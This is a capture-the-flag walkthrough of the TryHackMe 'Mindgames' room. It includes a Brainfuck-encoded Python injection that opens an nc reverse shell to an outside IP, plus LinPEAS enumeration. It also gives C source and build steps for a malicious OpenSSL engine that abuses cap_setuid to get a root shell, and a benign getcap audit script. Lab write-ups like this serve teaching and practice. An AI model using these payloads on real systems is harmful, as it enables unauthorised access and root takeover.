Mindgames

Room Link: https://tryhackme.com/room/mindgames

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Nothing of note was found; the pages listed are all broken links.

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

https://www.dcode.fr/brainfuck-language

Encode

__import__("os").system("ls -la")

Kali

nc -lvnp 4242

Encode

__import__("os").system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.231.107 4242 >/tmp/f")

Upgrade to an interactive TTY (gives tab completion and job control)

python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

LinPeas

Kali

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
python2 -m SimpleHTTPServer 81

Victim

cd /tmp/
wget http://$KALI:81/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

Privilege Escalation

Exploit: https://chaudhary1337.github.io/p/how-to-openssl-cap_setuid-ep-privesc-exploit/

LinPEAS reports that openssl carries the cap_setuid+ep file capability.

This can be confirmed directly with getcap:

Victim

getcap -r / 2>/dev/null
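As an added defensive check (not part of the room notes), the script below audits getcap output for file capabilities that give a binary root-equivalent power, the class that made openssl exploitable here. It accepts both libcap output formats on stdin and runs on constructed sample lines; the watch list and the run_sample helper are this example's own.

```shell
#!/bin/sh
# Added audit helper (not from the room): flag file capabilities that let a
# binary escalate to root-equivalent power, such as the cap_setuid+ep that
# LinPEAS reported on openssl. Reads `getcap -r / 2>/dev/null` output on stdin
# in either libcap format:
#   old:  /usr/bin/ping = cap_net_raw+ep
#   new:  /usr/bin/ping cap_net_raw=ep
# Paths containing spaces are not handled.

# Capabilities that are effectively root when granted to an arbitrary binary.
DANGEROUS_CAPS="cap_setuid cap_setgid cap_sys_admin cap_dac_override cap_dac_read_search cap_sys_ptrace cap_sys_module cap_chown cap_fowner cap_setfcap"

# audit_caps: print "<path> <capability>" for every watch-list hit on stdin.
audit_caps() {
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        path=${line%% *}                 # first field is the file path
        rest=${line#"$path"}             # remainder: " = caps+ep" or " caps=ep"
        rest=${rest#" = "}
        rest=${rest#" "}
        # Drop the +ep/=ep flag groups and split the comma list into words.
        for cap in $(printf '%s\n' "$rest" | sed 's/[+=][a-z]*//g; s/,/ /g'); do
            case " $DANGEROUS_CAPS " in
                *" $cap "*) printf '%s %s\n' "$path" "$cap" ;;
            esac
        done
    done
}

# Constructed sample output mixing both formats; the openssl line mirrors what
# LinPEAS showed in the room, the other paths are made up for the test.
SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/usr/bin/openssl = cap_setuid+ep
/opt/tools/helper cap_setuid,cap_setgid=ep
/usr/bin/gst-ptp-helper cap_net_bind_service,cap_net_admin+ep'

# run_sample: audit the constructed lines.
# On a live host use:  getcap -r / 2>/dev/null | audit_caps
run_sample() {
    printf '%s\n' "$SAMPLE_GETCAP" | audit_caps
}

run_sample
```

Expected hits are openssl (cap_setuid) and the helper (cap_setuid and cap_setgid); ping and gst-ptp-helper only carry network capabilities and are not reported.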

openssl-exploit-engine.c

#include <stdlib.h>           /* system() */
#include <unistd.h>           /* setuid(), setgid() */
#include <openssl/engine.h>

/* Called by OpenSSL when the dynamic engine is loaded; the cap_setuid+ep
   on the openssl binary is what lets setuid(0) succeed here. */
static int bind(ENGINE *e, const char *id)
{
  setuid(0); setgid(0);
  system("/bin/bash");
  return 1;                   /* report a successful bind to OpenSSL */
}

IMPLEMENT_DYNAMIC_BIND_FN(bind)
IMPLEMENT_DYNAMIC_CHECK_FN()

Kali

gcc -fPIC -o openssl-exploit-engine.o -c openssl-exploit-engine.c
gcc -shared -o openssl-exploit-engine.so -lcrypto openssl-exploit-engine.o
python2 -m SimpleHTTPServer 81

Victim

cd /tmp/
wget http://$KALI:81/openssl-exploit-engine.so
openssl req -engine ./openssl-exploit-engine.so
